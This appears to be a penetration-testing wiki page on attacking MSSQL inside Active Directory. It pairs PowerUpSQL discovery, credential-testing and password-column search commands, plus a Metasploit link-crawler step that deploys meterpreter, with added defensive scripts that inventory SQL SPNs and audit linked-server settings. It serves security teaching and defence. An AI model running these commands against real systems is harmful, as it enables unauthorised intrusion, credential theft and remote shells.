# MSSQL AD Abuse

### **MSSQL Enumeration / Discovery** <a href="#mssql-enumeration-discovery" id="mssql-enumeration-discovery"></a>

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2FzZWbn3EadWwVhFc4SPLP%2Fimage.png?alt=media&#x26;token=66c2803d-0187-40b0-80db-68b3bc3235b8" alt=""><figcaption></figcaption></figure>

The PowerShell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case.


```powershell
Import-Module .\PowerUpSQL.psd1
```

#### Enumerating from the network without domain session <a href="#enumerating-from-the-network-without-domain-session" id="enumerating-from-the-network-without-domain-session"></a>

{% code overflow="wrap" %}

```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

# If you don't have an AD account, you can try to find MSSQL instances by scanning via UDP
# First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP -Verbose -Threads 10

# If you have some valid credentials and you have discovered valid MSSQL hosts you can try to log in to them
# The discovered MSSQL servers must be in the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
```

{% endcode %}

#### Enumerating from inside the domain <a href="#enumerating-from-inside-the-domain" id="enumerating-from-inside-the-domain"></a>

{% code overflow="wrap" %}

```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

# Get info about valid MSSQL instances running in the domain
# This looks for SPNs that start with MSSQL (an SPN does not always mean a running MSSQL instance)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

# Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

# Try to connect and obtain info from each MSSQL server (also useful to check connectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

# Get DBs, test connections and get info in a one-liner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```

{% endcode %}
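Get-SQLInstanceDomain works by reading `MSSQLSvc/...` service principal names out of Active Directory. The following is an added example (not part of PowerUpSQL or this page's original content) that does the same inventory with the built-in `[adsisearcher]` accelerator, so a defender can list every SQL instance registered in the domain without extra modules and compare it against a known-asset list. The SPN format is the interesting part: the suffix after the colon is either a TCP port or a named-instance name, and an SPN with no suffix implies the default port. The function assumes a domain-joined host with a domain session; the regex, function names and output shape are the example's own.

```powershell
# Added example (not part of PowerUpSQL): inventory MSSQL instances registered as SPNs in AD.
# Assumes a domain-joined host with a domain session; [adsisearcher] is the built-in
# System.DirectoryServices.DirectorySearcher accelerator, so no extra module is needed.

function ConvertFrom-MssqlSpn {
    # Turns 'MSSQLSvc/host.domain.io:1433' or 'MSSQLSvc/host.domain.io:INSTANCE' into the
    # instance string PowerUpSQL expects ('host,1433' or 'host\INSTANCE'). Returns $null
    # for anything that is not an MSSQLSvc SPN.
    param([Parameter(Mandatory)][string]$Spn)
    if ($Spn -notmatch '^MSSQLSvc/(?<host>[^:]+)(?::(?<suffix>.+))?$') { return $null }
    $hostName = $Matches['host']
    $suffix   = $Matches['suffix']
    if (-not $suffix)           { return "$hostName,1433" }   # no suffix: default TCP port
    if ($suffix -match '^\d+$') { return "$hostName,$suffix" } # numeric suffix is a TCP port
    return "$hostName\$suffix"                                  # otherwise a named instance
}

function Get-MssqlSpnInventory {
    # One LDAP query for every account (computer or service account) holding an MSSQLSvc SPN.
    $searcher = [adsisearcher]'(servicePrincipalName=MSSQLSvc/*)'
    $searcher.PageSize = 1000
    $searcher.PropertiesToLoad.AddRange([string[]]@('serviceprincipalname', 'samaccountname'))
    foreach ($result in $searcher.FindAll()) {
        $account = [string]$result.Properties['samaccountname'][0]
        foreach ($spn in $result.Properties['serviceprincipalname']) {
            if ($spn -notlike 'MSSQLSvc/*') { continue }   # accounts usually hold other SPN types too
            $instance = ConvertFrom-MssqlSpn -Spn $spn
            if ($instance) {
                [pscustomobject]@{ Account = $account; Spn = $spn; Instance = $instance }
            }
        }
    }
}

# A registered SPN is not proof of a live listener (stale SPNs are common), so treat the list
# as input for a connectivity check such as PowerUpSQL's Get-SQLConnectionTest.
Get-MssqlSpnInventory | Sort-Object Instance -Unique | Format-Table -AutoSize
```

Feeding the `Instance` column into `Get-SQLConnectionTest` turns the inventory into the same accessible/inaccessible split the one-liner above produces; any instance that answers but is missing from the asset register is the one worth a closer look.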


### MSSQL Basic Abuse <a href="#mssql-basic-abuse" id="mssql-basic-abuse"></a>

#### Access DB <a href="#access-db" id="access-db"></a>

{% code overflow="wrap" %}

```powershell
# Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"

# Dump an instance (a lot of CSVs are generated in the current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"

# Search keywords in columns of the MSSQL DBs you can access
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
```

{% endcode %}

### Metasploit

You can easily check for trusted links using Metasploit.


{% code overflow="wrap" %}

```batch
#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```

{% endcode %}

Notice that Metasploit will only try to abuse the <mark style="color:orange;">**`openquery()`**</mark> function in MSSQL (so if you can't execute a command with `openquery()` you will need to try the `EXECUTE` method **manually** to execute commands; see more below).
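The difference between the two paths is a per-link server option: `openquery()` needs the link's Data Access option, while `EXECUTE ... AT` needs RPC Out. Both, together with the login mapping, are visible in the catalog views, so the same information a link crawler collects can be audited from the defending side. The following is an added example (not PowerUpSQL's or Metasploit's code) that uses `Get-SQLQuery` from the page's own module to list every linked server with its options and login mappings and to flag the configurations that make a link a pivot: RPC Out enabled, a catch-all mapping to a fixed remote login, or a remote login of `sa`. The instance name is a placeholder and the function and column aliases are the example's own.

```powershell
# Added example (not part of PowerUpSQL or Metasploit): audit linked-server options and login
# mappings. Assumes PowerUpSQL is imported and the caller may read sys.servers / sys.linked_logins.

function Get-LinkedServerAudit {
    param([Parameter(Mandatory)][string]$Instance)

    # sys.servers holds the per-link options; sys.linked_logins holds one row per login mapping.
    # local_principal_id = 0 is the catch-all mapping used by every login without an explicit one.
    $query = @"
SELECT s.name                   AS LinkedServer,
       s.data_source            AS DataSource,
       s.is_data_access_enabled AS DataAccess,   -- required for openquery()
       s.is_rpc_out_enabled     AS RpcOut,       -- required for EXECUTE ... AT
       CASE WHEN ll.local_principal_id = 0 THEN '<all logins>' ELSE sp.name END AS LocalLogin,
       ll.uses_self_credential  AS UsesSelfCredential,
       ll.remote_name           AS RemoteLogin
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name;
"@

    Get-SQLQuery -Instance $Instance -Query $query | ForEach-Object {
        $findings = @()
        if ([bool]$_.RpcOut) {
            $findings += 'RPC Out enabled (EXECUTE AT possible over this link)'
        }
        # Catch-all mapping to a fixed remote login: every local login reaches the remote as that account.
        if ($_.LocalLogin -eq '<all logins>' -and -not [bool]$_.UsesSelfCredential -and ($_.RemoteLogin -is [string])) {
            $findings += "all local logins map to fixed remote login '$($_.RemoteLogin)'"
        }
        if ($_.RemoteLogin -eq 'sa') {
            $findings += 'remote login is sa'
        }
        [pscustomobject]@{
            LinkedServer = $_.LinkedServer
            DataSource   = $_.DataSource
            DataAccess   = [bool]$_.DataAccess
            RpcOut       = [bool]$_.RpcOut
            LocalLogin   = $_.LocalLogin
            RemoteLogin  = $_.RemoteLogin
            Findings     = ($findings -join '; ')
        }
    }
}

# Placeholder instance name; replace with the server to audit.
Get-LinkedServerAudit -Instance 'sql.domain.io,1433' | Format-Table -AutoSize
```

Running this against each instance found by the enumeration steps gives the link graph from the inside: a row with RPC Out enabled and a fixed `sa` mapping is exactly the hop a crawler will take, and disabling RPC Out or replacing the catch-all mapping with per-login mappings removes it without breaking `openquery()`-based reporting that only needs Data Access.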
